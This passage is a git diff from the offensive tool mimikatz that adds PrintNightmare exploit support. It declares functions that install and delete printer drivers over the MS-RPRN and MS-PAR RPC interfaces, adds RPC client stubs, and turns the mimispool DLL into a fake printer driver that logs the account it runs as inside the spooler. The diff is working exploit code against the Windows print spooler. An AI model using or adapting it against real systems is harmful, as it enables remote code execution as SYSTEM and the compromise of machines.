_PDRIVER_INFO_2 *ppDriverInfo, DWORD *pcReturned); +BOOL kuhl_m_misc_printnightmare_FillStructure(PDRIVER_INFO_2 pInfo2, BOOL bIsX64, BOOL bIsDynamic, LPCWSTR szForce, BOOL bIsPar, handle_t hRemoteBinding); +void kuhl_m_misc_printnightmare_ListPrintersAndMaybeDelete(BOOL bIsPar, handle_t hRemoteBinding, LPCWSTR szEnvironment, BOOL bIsDelete); +void kuhl_m_misc_printnightmare_AddPrinterDriver(BOOL bIsPar, handle_t hRemoteBinding, PDRIVER_INFO_2 pInfo2, DWORD dwFlags); +BOOL kuhl_m_misc_printnightmare_EnumPrinters(BOOL bIsPar, handle_t hRemoteBinding, LPCWSTR szEnvironment, _PDRIVER_INFO_2 *ppDriverInfo, DWORD *pcReturned); BOOL CALLBACK kuhl_m_misc_detours_callback_process(PSYSTEM_PROCESS_INFORMATION pSystemProcessInformation, PVOID pvArg); BOOL CALLBACK kuhl_m_misc_detours_callback_module(PKULL_M_PROCESS_VERY_BASIC_MODULE_INFORMATION pModuleInformation, PVOID pvArg); diff --git a/mimispool/mimispool.c b/mimispool/mimispool.c index 282ddfd0..b233b860 100644 --- a/mimispool/mimispool.c +++ b/mimispool/mimispool.c @@ -7,22 +7,89 @@ BOOL APIENTRY DllMain(HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved) { - BOOL ret; + BOOL ret = TRUE; + + switch( ul_reason_for_call ) + { + case DLL_PROCESS_ATTACH: + kspool(TEXT(__FUNCTION__) L"-PROCESS_ATTACH"); + ret = FALSE; + // FALSE avoid to keep library in memory + // TRUE will mimic "real" driver/config -- to use/test with /useown on local (remote is not compatible with GetFileVersionInfo*) + break; - if(ul_reason_for_call == DLL_PROCESS_ATTACH) + case DLL_THREAD_ATTACH: + kspool(TEXT(__FUNCTION__) L"-THREAD_ATTACH"); + break; + + case DLL_THREAD_DETACH: + kspool(TEXT(__FUNCTION__) L"-THREAD_DETACH"); + break; + + case DLL_PROCESS_DETACH: + kspool(TEXT(__FUNCTION__) L"-PROCESS_DETACH"); + break; + } + + return ret; +} + +BOOL APIENTRY APIENTRY DrvQueryDriverInfo(DWORD dwMode, PVOID pBuffer, DWORD cbBuf, PDWORD pcbNeeded) +{ + BOOL status = FALSE; + + kspool(TEXT(__FUNCTION__)); + + if ( dwMode == DRVQUERY_USERMODE) { - kspool(); - ret = FALSE; + *pcbNeeded = sizeof(DWORD); + if (pBuffer && (cbBuf >= sizeof(DWORD))) + { + status = TRUE; + *(DWORD *)pBuffer = TRUE; + } + SetLastError(ERROR_INSUFFICIENT_BUFFER); } else { - ret = TRUE; + SetLastError(ERROR_INVALID_PARAMETER); } - return ret; + return status; +} + +BOOL APIENTRY DrvEnableDriver(ULONG iEngineVersion, ULONG cj, DRVENABLEDATA *pded) +{ + BOOL status = FALSE; + + kspool(TEXT(__FUNCTION__)); + + if((iEngineVersion < 0x20000) || (cj < 0x10)) + { + SetLastError(ERROR_BAD_DRIVER_LEVEL); + } + else + { + pded->iDriverVersion = 0x20000; + pded->pdrvfn = NULL; + pded->c = 0; + status = TRUE; + } + + return status; +} + +VOID APIENTRY DrvDisableDriver() +{ + kspool(TEXT(__FUNCTION__)); +} + +VOID APIENTRY DrvResetConfigCache() +{ + kspool(TEXT(__FUNCTION__)); } -void kspool() +void kspool(LPCWSTR szFrom) { FILE * kspool_logfile; WCHAR Buffer[256 + 1]; @@ -33,11 +100,9 @@ void kspool() if(kspool_logfile = _wfopen(L"mimispool.log", L"a")) #pragma warning(pop) { - klog(kspool_logfile, L"Hello!\n"); - if(GetUserName(Buffer, &cbBuffer)) { - klog(kspool_logfile, L"I\'m running with \'%s\' (and I like it :)\n", Buffer); + klog(kspool_logfile, L"[" PLATFORM L"] [%s] I\'m running with \'%s\' (and I like it :)\n", szFrom, Buffer); } fclose(kspool_logfile); diff --git a/mimispool/mimispool.def b/mimispool/mimispool.def new file mode 100644 index 00000000..2f4b69fd --- /dev/null +++ b/mimispool/mimispool.def @@ -0,0 +1,7 @@ +LIBRARY +EXPORTS + DrvQueryDriverInfo + DrvEnableDriver + DrvDisableDriver + + DrvResetConfigCache \ No newline at end of file diff --git a/mimispool/mimispool.h b/mimispool/mimispool.h index c50e15c4..6c17c719 100644 --- a/mimispool/mimispool.h +++ b/mimispool/mimispool.h @@ -7,6 +7,30 @@ #include #include -BOOL APIENTRY DllMain(HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved); -void kspool(); +#if defined(_M_X64) || defined(_M_ARM64) // to do, for real one day +#define PLATFORM L"x64" +#elif defined(_M_IX86) +#define PLATFORM L"x86" +#endif + +typedef LONG_PTR (APIENTRY *PFN)(); + +typedef struct _DRVFN { + ULONG iFunc; + PFN pfn; +} DRVFN, *PDRVFN; + +typedef struct tagDRVENABLEDATA { + ULONG iDriverVersion; + ULONG c; + DRVFN *pdrvfn; +} DRVENABLEDATA, *PDRVENABLEDATA; + +#define DRVQUERY_USERMODE 1 + +BOOL APIENTRY APIENTRY DrvQueryDriverInfo(DWORD dwMode, __out_bcount(cbBuf) PVOID pBuffer, DWORD cbBuf, __out_ecount(1) PDWORD pcbNeeded); +__control_entrypoint(DeviceDriver) BOOL APIENTRY DrvEnableDriver(ULONG iEngineVersion, ULONG cj, __in_bcount(cj) DRVENABLEDATA *pded); +VOID APIENTRY DrvDisableDriver(); + +void kspool(LPCWSTR szFrom); void klog(FILE * logfile, PCWCHAR format, ...); \ No newline at end of file diff --git a/mimispool/mimispool.rc b/mimispool/mimispool.rc index 0299dbf77056e2466d6651458ed0b8e857bc6e29..7e9b80f31e9b3b9905c2b0c1e7ae23e0198798cc 100644 GIT binary patch delta 64 zcmZqSpTR%j0jmLn4ukQ=r-qEe@eJV%o(z5rE)4!aRxpDxgVAJBCROGjhOo`HOpQ!H SrFsm;llz&KH$P*U#{>ZFRSy#Y delta 36 scmbQi-@-rP!DJyup^cwZ7$<8nsWAI6_-qbjYGj%`k6B~$FP3>s0N#!Z-v9sr diff --git a/mimispool/mimispool.vcxproj b/mimispool/mimispool.vcxproj index 8a6ff7ab..40dc68a7 100644 --- a/mimispool/mimispool.vcxproj +++ b/mimispool/mimispool.vcxproj @@ -85,6 +85,7 @@ false true UseLinkTimeCodeGeneration + mimispool.def @@ -97,4 +98,7 @@ + + + \ No newline at end of file diff --git a/mimispool/mimispool.vcxproj.filters b/mimispool/mimispool.vcxproj.filters index aa59f7ea..3d856258 100644 --- a/mimispool/mimispool.vcxproj.filters +++ b/mimispool/mimispool.vcxproj.filters @@ -9,4 +9,7 @@ + + + \ No newline at end of file diff --git a/modules/kull_m_busylight.c b/modules/kull_m_busylight.c index c80268ab..40f77fd0 100644 --- a/modules/kull_m_busylight.c +++ b/modules/kull_m_busylight.c @@ -116,7 +116,11 @@ BOOL kull_m_busylight_devices_get(PBUSYLIGHT_DEVICE *devices, DWORD *count, DWOR { PRINT_ERROR_AUTO(L"CreateThread (hKeepAliveThread)"); CloseHandle((*next)->hBusy); - LocalFree(*next); + if ((*next)->DevicePath) + { + free((*next)->DevicePath); + } + *next = (PBUSYLIGHT_DEVICE) LocalFree(*next); } } else @@ -128,6 +132,10 @@ BOOL kull_m_busylight_devices_get(PBUSYLIGHT_DEVICE *devices, DWORD *count, DWOR else { PRINT_ERROR_AUTO(L"CreateFile (hBusy)"); + if ((*next)->DevicePath) + { + free((*next)->DevicePath); + } *next = (PBUSYLIGHT_DEVICE) LocalFree(*next); } } diff --git a/modules/rpc/kull_m_rpc_ms-par.h b/modules/rpc/kull_m_rpc_ms-par.h index f44addc7..c58a611c 100644 --- a/modules/rpc/kull_m_rpc_ms-par.h +++ b/modules/rpc/kull_m_rpc_ms-par.h @@ -42,6 +42,7 @@ DWORD RpcAsyncOpenPrinter(handle_t hRemoteBinding, wchar_t *pPrinterName, PRINTE DWORD RpcAsyncClosePrinter(PRINTER_HANDLE *phPrinter); DWORD RpcAsyncAddPrinterDriver(handle_t hRemoteBinding, wchar_t *pName, DRIVER_CONTAINER *pDriverContainer, DWORD dwFileCopyFlags); DWORD RpcAsyncEnumPrinterDrivers(handle_t hRemoteBinding, wchar_t *pName, wchar_t *pEnvironment, DWORD Level, unsigned char *pDrivers, DWORD cbBuf, DWORD *pcbNeeded, DWORD *pcReturned); +DWORD RpcAsyncGetPrinterDriverDirectory(handle_t hRemoteBinding, wchar_t *pName, wchar_t *pEnvironment, DWORD Level, unsigned char *pDriverDirectory, DWORD cbBuf, DWORD *pcbNeeded); DWORD RpcAsyncDeletePrinterDriverEx(handle_t hRemoteBinding, wchar_t *pName, wchar_t *pEnvironment, wchar_t *pDriverName, DWORD dwDeleteFlag, DWORD dwVersionNum); extern RPC_IF_HANDLE IRemoteWinspool_v1_0_c_ifspec; \ No newline at end of file diff --git a/modules/rpc/kull_m_rpc_ms-par_c.c b/modules/rpc/kull_m_rpc_ms-par_c.c index e8943d1d..1f87d0e8 100644 --- a/modules/rpc/kull_m_rpc_ms-par_c.c +++ b/modules/rpc/kull_m_rpc_ms-par_c.c @@ -10,7 +10,7 @@ typedef struct _ms2Dpar_MIDL_TYPE_FORMAT_STRING { typedef struct _ms2Dpar_MIDL_PROC_FORMAT_STRING { SHORT Pad; - UCHAR Format[315]; + UCHAR Format[387]; } ms2Dpar_MIDL_PROC_FORMAT_STRING; extern const ms2Dpar_MIDL_TYPE_FORMAT_STRING ms2Dpar__MIDL_TypeFormatString; @@ -35,9 +35,13 @@ DWORD RpcAsyncEnumPrinterDrivers(handle_t hRemoteBinding, wchar_t *pName, wchar_ { return (DWORD) NdrClientCall2((PMIDL_STUB_DESC) &IRemoteWinspool_StubDesc, (PFORMAT_STRING) &ms2Dpar__MIDL_ProcFormatString.Format[170], hRemoteBinding, pName, pEnvironment, Level, pDrivers, cbBuf, pcbNeeded, pcReturned).Simple; } +DWORD RpcAsyncGetPrinterDriverDirectory(handle_t hRemoteBinding, wchar_t *pName, wchar_t *pEnvironment, DWORD Level, unsigned char *pDriverDirectory, DWORD cbBuf, DWORD *pcbNeeded) +{ + return (DWORD) NdrClientCall2((PMIDL_STUB_DESC) &IRemoteWinspool_StubDesc, (PFORMAT_STRING) &ms2Dpar__MIDL_ProcFormatString.Format[248], hRemoteBinding, pName, pEnvironment, Level, pDriverDirectory, cbBuf, pcbNeeded).Simple; +} DWORD RpcAsyncDeletePrinterDriverEx(handle_t hRemoteBinding, wchar_t *pName, wchar_t *pEnvironment, wchar_t *pDriverName, DWORD dwDeleteFlag, DWORD dwVersionNum) { - return (DWORD) NdrClientCall2((PMIDL_STUB_DESC) &IRemoteWinspool_StubDesc, (PFORMAT_STRING) &ms2Dpar__MIDL_ProcFormatString.Format[248], hRemoteBinding, pName, pEnvironment, pDriverName, dwDeleteFlag, dwVersionNum).Simple; + return (DWORD) NdrClientCall2((PMIDL_STUB_DESC) &IRemoteWinspool_StubDesc, (PFORMAT_STRING) &ms2Dpar__MIDL_ProcFormatString.Format[320], hRemoteBinding, pName, pEnvironment, pDriverName, dwDeleteFlag, dwVersionNum).Simple; } static const ms2Dpar_MIDL_PROC_FORMAT_STRING ms2Dpar__MIDL_ProcFormatString = {0, { 0x00, 0x48, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x32, 0x00, 0x00, 0x00, 0x08, 0x00, 0x40, 0x00, 0x46, 0x07, 0x0a, 0x05, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x0b, 0x00, @@ -47,9 +51,12 @@ static const ms2Dpar_MIDL_PROC_FORMAT_STRING ms2Dpar__MIDL_ProcFormatString = {0 0x00, 0x00, 0x08, 0x00, 0x08, 0x00, 0x46, 0x04, 0x0a, 0x05, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x0b, 0x00, 0x08, 0x00, 0x02, 0x00, 0x0b, 0x01, 0x10, 0x00, 0xc6, 0x02, 0x48, 0x00, 0x18, 0x00, 0x08, 0x00, 0x70, 0x00, 0x20, 0x00, 0x08, 0x00, 0x00, 0x48, 0x00, 0x00, 0x00, 0x00, 0x28, 0x00, 0x48, 0x00, 0x32, 0x00, 0x00, 0x00, 0x10, 0x00, 0x40, 0x00, 0x47, 0x08, 0x0a, 0x07, 0x01, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x0b, 0x00, 0x08, 0x00, 0x02, 0x00, 0x0b, 0x00, 0x10, 0x00, 0x02, 0x00, 0x48, 0x00, 0x18, 0x00, 0x08, 0x00, 0x1b, 0x00, 0x20, 0x00, 0xd6, 0x02, - 0x48, 0x00, 0x28, 0x00, 0x08, 0x00, 0x50, 0x21, 0x30, 0x00, 0x08, 0x00, 0x50, 0x21, 0x38, 0x00, 0x08, 0x00, 0x70, 0x00, 0x40, 0x00, 0x08, 0x00, 0x00, 0x48, 0x00, 0x00, 0x00, 0x00, 0x2b, 0x00, - 0x38, 0x00, 0x32, 0x00, 0x00, 0x00, 0x10, 0x00, 0x08, 0x00, 0x46, 0x06, 0x0a, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x0b, 0x00, 0x08, 0x00, 0x02, 0x00, 0x0b, 0x01, 0x10, 0x00, - 0xec, 0x02, 0x0b, 0x01, 0x18, 0x00, 0xec, 0x02, 0x48, 0x00, 0x20, 0x00, 0x08, 0x00, 0x48, 0x00, 0x28, 0x00, 0x08, 0x00, 0x70, 0x00, 0x30, 0x00, 0x08, 0x00, 0x00, + 0x48, 0x00, 0x28, 0x00, 0x08, 0x00, 0x50, 0x21, 0x30, 0x00, 0x08, 0x00, 0x50, 0x21, 0x38, 0x00, 0x08, 0x00, 0x70, 0x00, 0x40, 0x00, 0x08, 0x00, 0x00, 0x48, 0x00, 0x00, 0x00, 0x00, 0x29, 0x00, + 0x40, 0x00, 0x32, 0x00, 0x00, 0x00, 0x10, 0x00, 0x24, 0x00, 0x47, 0x07, 0x0a, 0x07, 0x01, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x0b, 0x00, 0x08, 0x00, 0x02, 0x00, 0x0b, 0x00, 0x10, 0x00, + 0x02, 0x00, 0x48, 0x00, 0x18, 0x00, 0x08, 0x00, 0x1b, 0x00, 0x20, 0x00, 0xd6, 0x02, 0x48, 0x00, 0x28, 0x00, 0x08, 0x00, 0x50, 0x21, 0x30, 0x00, 0x08, 0x00, 0x70, 0x00, 0x38, 0x00, 0x08, 0x00, + 0x00, 0x48, 0x00, 0x00, 0x00, 0x00, 0x2b, 0x00, 0x38, 0x00, 0x32, 0x00, 0x00, 0x00, 0x10, 0x00, 0x08, 0x00, 0x46, 0x06, 0x0a, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x0b, 0x00, + 0x08, 0x00, 0x02, 0x00, 0x0b, 0x01, 0x10, 0x00, 0xec, 0x02, 0x0b, 0x01, 0x18, 0x00, 0xec, 0x02, 0x48, 0x00, 0x20, 0x00, 0x08, 0x00, 0x48, 0x00, 0x28, 0x00, 0x08, 0x00, 0x70, 0x00, 0x30, 0x00, + 0x08, 0x00, 0x00, }}; static const ms2Dpar_MIDL_TYPE_FORMAT_STRING ms2Dpar__MIDL_TypeFormatString = {0, { 0x00, 0x00, 0x12, 0x08, 0x25, 0x5c, 0x11, 0x04, 0x02, 0x00, 0x30, 0xa0, 0x00, 0x00, 0x11, 0x00, 0x0e, 0x00, 0x1b, 0x00, 0x01, 0x00, 0x19, 0x00, 0x00, 0x00, 0x01, 0x00, 0x02, 0x5b, 0x1a, 0x03, @@ -85,7 +92,7 @@ typedef struct _ms2Dpar_MIDL_TYPE_FORMAT_STRING { typedef struct _ms2Dpar_MIDL_PROC_FORMAT_STRING { SHORT Pad; - UCHAR Format[305]; + UCHAR Format[375]; } ms2Dpar_MIDL_PROC_FORMAT_STRING; extern const ms2Dpar_MIDL_TYPE_FORMAT_STRING ms2Dpar__MIDL_TypeFormatString; @@ -110,9 +117,13 @@ DWORD RpcAsyncEnumPrinterDrivers(handle_t hRemoteBinding, wchar_t *pName, wchar_ { return (DWORD) NdrClientCall2((PMIDL_STUB_DESC) &IRemoteWinspool_StubDesc, (PFORMAT_STRING) &ms2Dpar__MIDL_ProcFormatString.Format[164], (unsigned char *) &hRemoteBinding).Simple; } +DWORD RpcAsyncGetPrinterDriverDirectory(handle_t hRemoteBinding, wchar_t *pName, wchar_t *pEnvironment, DWORD Level, unsigned char *pDriverDirectory, DWORD cbBuf, DWORD *pcbNeeded) +{ + return (DWORD) NdrClientCall2((PMIDL_STUB_DESC) &IRemoteWinspool_StubDesc, (PFORMAT_STRING) &ms2Dpar__MIDL_ProcFormatString.Format[240], ( unsigned char *) &hRemoteBinding).Simple; +} DWORD RpcAsyncDeletePrinterDriverEx(handle_t hRemoteBinding, wchar_t *pName, wchar_t *pEnvironment, wchar_t *pDriverName, DWORD dwDeleteFlag, DWORD dwVersionNum) { - return (DWORD) NdrClientCall2((PMIDL_STUB_DESC) &IRemoteWinspool_StubDesc, (PFORMAT_STRING) &ms2Dpar__MIDL_ProcFormatString.Format[240], (unsigned char *) &hRemoteBinding).Simple; + return (DWORD) NdrClientCall2((PMIDL_STUB_DESC) &IRemoteWinspool_StubDesc, (PFORMAT_STRING) &ms2Dpar__MIDL_ProcFormatString.Format[310], (unsigned char *) &hRemoteBinding).Simple; } #pragma optimize("", on) static const ms2Dpar_MIDL_PROC_FORMAT_STRING ms2Dpar__MIDL_ProcFormatString = {0, { @@ -123,9 +134,11 @@ static const ms2Dpar_MIDL_PROC_FORMAT_STRING ms2Dpar__MIDL_ProcFormatString = {0 0x08, 0x00, 0x46, 0x04, 0x08, 0x05, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x0b, 0x00, 0x04, 0x00, 0x02, 0x00, 0x0b, 0x01, 0x08, 0x00, 0x1c, 0x04, 0x48, 0x00, 0x0c, 0x00, 0x08, 0x00, 0x70, 0x00, 0x10, 0x00, 0x08, 0x00, 0x00, 0x48, 0x00, 0x00, 0x00, 0x00, 0x28, 0x00, 0x24, 0x00, 0x32, 0x00, 0x00, 0x00, 0x10, 0x00, 0x40, 0x00, 0x47, 0x08, 0x08, 0x07, 0x01, 0x00, 0x01, 0x00, 0x00, 0x00, 0x0b, 0x00, 0x04, 0x00, 0x02, 0x00, 0x0b, 0x00, 0x08, 0x00, 0x02, 0x00, 0x48, 0x00, 0x0c, 0x00, 0x08, 0x00, 0x1b, 0x00, 0x10, 0x00, 0x2a, 0x04, 0x48, 0x00, 0x14, 0x00, 0x08, 0x00, 0x50, 0x21, - 0x18, 0x00, 0x08, 0x00, 0x50, 0x21, 0x1c, 0x00, 0x08, 0x00, 0x70, 0x00, 0x20, 0x00, 0x08, 0x00, 0x00, 0x48, 0x00, 0x00, 0x00, 0x00, 0x2b, 0x00, 0x1c, 0x00, 0x32, 0x00, 0x00, 0x00, 0x10, 0x00, - 0x08, 0x00, 0x46, 0x06, 0x08, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x0b, 0x00, 0x04, 0x00, 0x02, 0x00, 0x0b, 0x01, 0x08, 0x00, 0x40, 0x04, 0x0b, 0x01, 0x0c, 0x00, 0x40, 0x04, 0x48, 0x00, - 0x10, 0x00, 0x08, 0x00, 0x48, 0x00, 0x14, 0x00, 0x08, 0x00, 0x70, 0x00, 0x18, 0x00, 0x08, 0x00, 0x00, + 0x18, 0x00, 0x08, 0x00, 0x50, 0x21, 0x1c, 0x00, 0x08, 0x00, 0x70, 0x00, 0x20, 0x00, 0x08, 0x00, 0x00, 0x48, 0x00, 0x00, 0x00, 0x00, 0x29, 0x00, 0x20, 0x00, 0x32, 0x00, 0x00, 0x00, 0x10, 0x00, + 0x24, 0x00, 0x47, 0x07, 0x08, 0x07, 0x01, 0x00, 0x01, 0x00, 0x00, 0x00, 0x0b, 0x00, 0x04, 0x00, 0x02, 0x00, 0x0b, 0x00, 0x08, 0x00, 0x02, 0x00, 0x48, 0x00, 0x0c, 0x00, 0x08, 0x00, 0x1b, 0x00, + 0x10, 0x00, 0x2a, 0x04, 0x48, 0x00, 0x14, 0x00, 0x08, 0x00, 0x50, 0x21, 0x18, 0x00, 0x08, 0x00, 0x70, 0x00, 0x1c, 0x00, 0x08, 0x00, 0x00, 0x48, 0x00, 0x00, 0x00, 0x00, 0x2b, 0x00, 0x1c, 0x00, + 0x32, 0x00, 0x00, 0x00, 0x10, 0x00, 0x08, 0x00, 0x46, 0x06, 0x08, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x0b, 0x00, 0x04, 0x00, 0x02, 0x00, 0x0b, 0x01, 0x08, 0x00, 0x40, 0x04, 0x0b, 0x01, + 0x0c, 0x00, 0x40, 0x04, 0x48, 0x00, 0x10, 0x00, 0x08, 0x00, 0x48, 0x00, 0x14, 0x00, 0x08, 0x00, 0x70, 0x00, 0x18, 0x00, 0x08, 0x00, 0x00, }}; static const ms2Dpar_MIDL_TYPE_FORMAT_STRING ms2Dpar__MIDL_TypeFormatString = {0, { 0x00, 0x00, 0x12, 0x08, 0x25, 0x5c, 0x11, 0x04, 0x02, 0x00, 0x30, 0xa0, 0x00, 0x00, 0x11, 0x00, 0x0e, 0x00, 0x1b, 0x00, 0x01, 0x00, 0x19, 0x00, 0x00, 0x00, 0x01, 0x00, 0x02, 0x5b, 0x16, 0x03, diff --git a/modules/rpc/kull_m_rpc_ms-rprn.c b/modules/rpc/kull_m_rpc_ms-rprn.c index 7362cf43..3684b6d6 100644 --- a/modules/rpc/kull_m_rpc_ms-rprn.c +++ b/modules/rpc/kull_m_rpc_ms-rprn.c @@ -12,9 +12,9 @@ typedef struct _ms2Drprn_MIDL_TYPE_FORMAT_STRING { typedef struct _ms2Drprn_MIDL_PROC_FORMAT_STRING { SHORT Pad; #if defined(_M_X64) || defined(_M_ARM64) // TODO:ARM64 - UCHAR Format[441]; + UCHAR Format[515]; #elif defined(_M_IX86) - UCHAR Format[427]; + UCHAR Format[499]; #endif } ms2Drprn_MIDL_PROC_FORMAT_STRING; @@ -36,25 +36,29 @@ DWORD RpcEnumPrinterDrivers(STRING_HANDLE pName, wchar_t *pEnvironment, DWORD Le { return (DWORD) NdrClientCall2((PMIDL_STUB_DESC) &winspool_StubDesc, (PFORMAT_STRING) &ms2Drprn__MIDL_ProcFormatString.Format[68], pName, pEnvironment, Level, pDrivers, cbBuf, pcbNeeded, pcReturned).Simple; } +DWORD RpcGetPrinterDriverDirectory(STRING_HANDLE pName, wchar_t *pEnvironment, DWORD Level, BYTE *pDriverDirectory, DWORD cbBuf, DWORD *pcbNeeded) +{ + return (DWORD) NdrClientCall2((PMIDL_STUB_DESC) &winspool_StubDesc, (PFORMAT_STRING) &ms2Drprn__MIDL_ProcFormatString.Format[148], pName, pEnvironment, Level, pDriverDirectory, cbBuf, pcbNeeded).Simple; +} DWORD RpcClosePrinter(PRINTER_HANDLE *phPrinter) { - return (DWORD) NdrClientCall2((PMIDL_STUB_DESC) &winspool_StubDesc, (PFORMAT_STRING) &ms2Drprn__MIDL_ProcFormatString.Format[148], phPrinter).Simple; + return (DWORD) NdrClientCall2((PMIDL_STUB_DESC) &winspool_StubDesc, (PFORMAT_STRING) &ms2Drprn__MIDL_ProcFormatString.Format[222], phPrinter).Simple; } DWORD RpcFindClosePrinterChangeNotification(PRINTER_HANDLE hPrinter) { - return (DWORD) NdrClientCall2((PMIDL_STUB_DESC) &winspool_StubDesc, (PFORMAT_STRING) &ms2Drprn__MIDL_ProcFormatString.Format[192], hPrinter).Simple; + return (DWORD) NdrClientCall2((PMIDL_STUB_DESC) &winspool_StubDesc, (PFORMAT_STRING) &ms2Drprn__MIDL_ProcFormatString.Format[266], hPrinter).Simple; } DWORD RpcRemoteFindFirstPrinterChangeNotification(PRINTER_HANDLE hPrinter, DWORD fdwFlags, DWORD fdwOptions, wchar_t *pszLocalMachine, DWORD dwPrinterLocal, DWORD cbBuffer, BYTE *pBuffer) { - return (DWORD) NdrClientCall2((PMIDL_STUB_DESC) &winspool_StubDesc, (PFORMAT_STRING) &ms2Drprn__MIDL_ProcFormatString.Format[236], hPrinter, fdwFlags, fdwOptions, pszLocalMachine, dwPrinterLocal, cbBuffer, pBuffer).Simple; + return (DWORD) NdrClientCall2((PMIDL_STUB_DESC) &winspool_StubDesc, (PFORMAT_STRING) &ms2Drprn__MIDL_ProcFormatString.Format[310], hPrinter, fdwFlags, fdwOptions, pszLocalMachine, dwPrinterLocal, cbBuffer, pBuffer).Simple; } DWORD RpcDeletePrinterDriverEx(STRING_HANDLE pName, wchar_t *pEnvironment, wchar_t *pDriverName, DWORD dwDeleteFlag, DWORD dwVersionNum) { - return (DWORD) NdrClientCall2((PMIDL_STUB_DESC) &winspool_StubDesc, (PFORMAT_STRING) &ms2Drprn__MIDL_ProcFormatString.Format[316], pName, pEnvironment, pDriverName, dwDeleteFlag, dwVersionNum).Simple; + return (DWORD) NdrClientCall2((PMIDL_STUB_DESC) &winspool_StubDesc, (PFORMAT_STRING) &ms2Drprn__MIDL_ProcFormatString.Format[390], pName, pEnvironment, pDriverName, dwDeleteFlag, dwVersionNum).Simple; } DWORD RpcAddPrinterDriverEx(STRING_HANDLE pName, DRIVER_CONTAINER *pDriverContainer, DWORD dwFileCopyFlags) { - return (DWORD) NdrClientCall2((PMIDL_STUB_DESC) &winspool_StubDesc, (PFORMAT_STRING) &ms2Drprn__MIDL_ProcFormatString.Format[384], pName, pDriverContainer, dwFileCopyFlags).Simple; + return (DWORD) NdrClientCall2((PMIDL_STUB_DESC) &winspool_StubDesc, (PFORMAT_STRING) &ms2Drprn__MIDL_ProcFormatString.Format[458], pName, pDriverContainer, dwFileCopyFlags).Simple; } static const ms2Drprn_MIDL_PROC_FORMAT_STRING ms2Drprn__MIDL_ProcFormatString = {0, { @@ -62,16 +66,19 @@ static const ms2Drprn_MIDL_PROC_FORMAT_STRING ms2Drprn__MIDL_ProcFormatString = 0x0b, 0x00, 0x00, 0x00, 0x02, 0x00, 0x10, 0x01, 0x08, 0x00, 0x0a, 0x00, 0x0b, 0x00, 0x10, 0x00, 0x02, 0x00, 0x0b, 0x01, 0x18, 0x00, 0x1e, 0x00, 0x48, 0x00, 0x20, 0x00, 0x08, 0x00, 0x70, 0x00, 0x28, 0x00, 0x08, 0x00, 0x00, 0x48, 0x00, 0x00, 0x00, 0x00, 0x0a, 0x00, 0x40, 0x00, 0x31, 0x08, 0x00, 0x00, 0x00, 0x5c, 0x10, 0x00, 0x40, 0x00, 0x47, 0x08, 0x0a, 0x07, 0x01, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x0b, 0x00, 0x00, 0x00, 0x02, 0x00, 0x0b, 0x00, 0x08, 0x00, 0x02, 0x00, 0x48, 0x00, 0x10, 0x00, 0x08, 0x00, 0x1b, 0x00, 0x18, 0x00, 0x2e, 0x00, 0x48, 0x00, 0x20, 0x00, - 0x08, 0x00, 0x50, 0x21, 0x28, 0x00, 0x08, 0x00, 0x50, 0x21, 0x30, 0x00, 0x08, 0x00, 0x70, 0x00, 0x38, 0x00, 0x08, 0x00, 0x00, 0x48, 0x00, 0x00, 0x00, 0x00, 0x1d, 0x00, 0x10, 0x00, 0x30, 0xe0, - 0x00, 0x00, 0x00, 0x00, 0x38, 0x00, 0x40, 0x00, 0x44, 0x02, 0x0a, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x18, 0x01, 0x00, 0x00, 0x46, 0x00, 0x70, 0x00, 0x08, 0x00, 0x08, 0x00, - 0x00, 0x48, 0x00, 0x00, 0x00, 0x00, 0x38, 0x00, 0x10, 0x00, 0x30, 0x40, 0x00, 0x00, 0x00, 0x00, 0x24, 0x00, 0x08, 0x00, 0x44, 0x02, 0x0a, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x08, 0x00, 0x00, 0x00, 0x4a, 0x00, 0x70, 0x00, 0x08, 0x00, 0x08, 0x00, 0x00, 0x48, 0x00, 0x00, 0x00, 0x00, 0x3e, 0x00, 0x40, 0x00, 0x30, 0x40, 0x00, 0x00, 0x00, 0x00, 0x44, 0x00, 0x08, 0x00, - 0x47, 0x08, 0x0a, 0x07, 0x01, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x08, 0x00, 0x00, 0x00, 0x4a, 0x00, 0x48, 0x00, 0x08, 0x00, 0x08, 0x00, 0x48, 0x00, 0x10, 0x00, 0x08, 0x00, 0x0b, 0x00, - 0x18, 0x00, 0x02, 0x00, 0x48, 0x00, 0x20, 0x00, 0x08, 0x00, 0x88, 0x00, 0x28, 0x00, 0x4e, 0x00, 0x1b, 0x00, 0x30, 0x00, 0x58, 0x00, 0x70, 0x00, 0x38, 0x00, 0x08, 0x00, 0x00, 0x48, 0x00, 0x00, - 0x00, 0x00, 0x54, 0x00, 0x30, 0x00, 0x31, 0x08, 0x00, 0x00, 0x00, 0x5c, 0x10, 0x00, 0x08, 0x00, 0x46, 0x06, 0x0a, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x0b, 0x00, 0x00, 0x00, - 0x02, 0x00, 0x0b, 0x01, 0x08, 0x00, 0x6a, 0x00, 0x0b, 0x01, 0x10, 0x00, 0x6a, 0x00, 0x48, 0x00, 0x18, 0x00, 0x08, 0x00, 0x48, 0x00, 0x20, 0x00, 0x08, 0x00, 0x70, 0x00, 0x28, 0x00, 0x08, 0x00, - 0x00, 0x48, 0x00, 0x00, 0x00, 0x00, 0x59, 0x00, 0x20, 0x00, 0x31, 0x08, 0x00, 0x00, 0x00, 0x5c, 0x08, 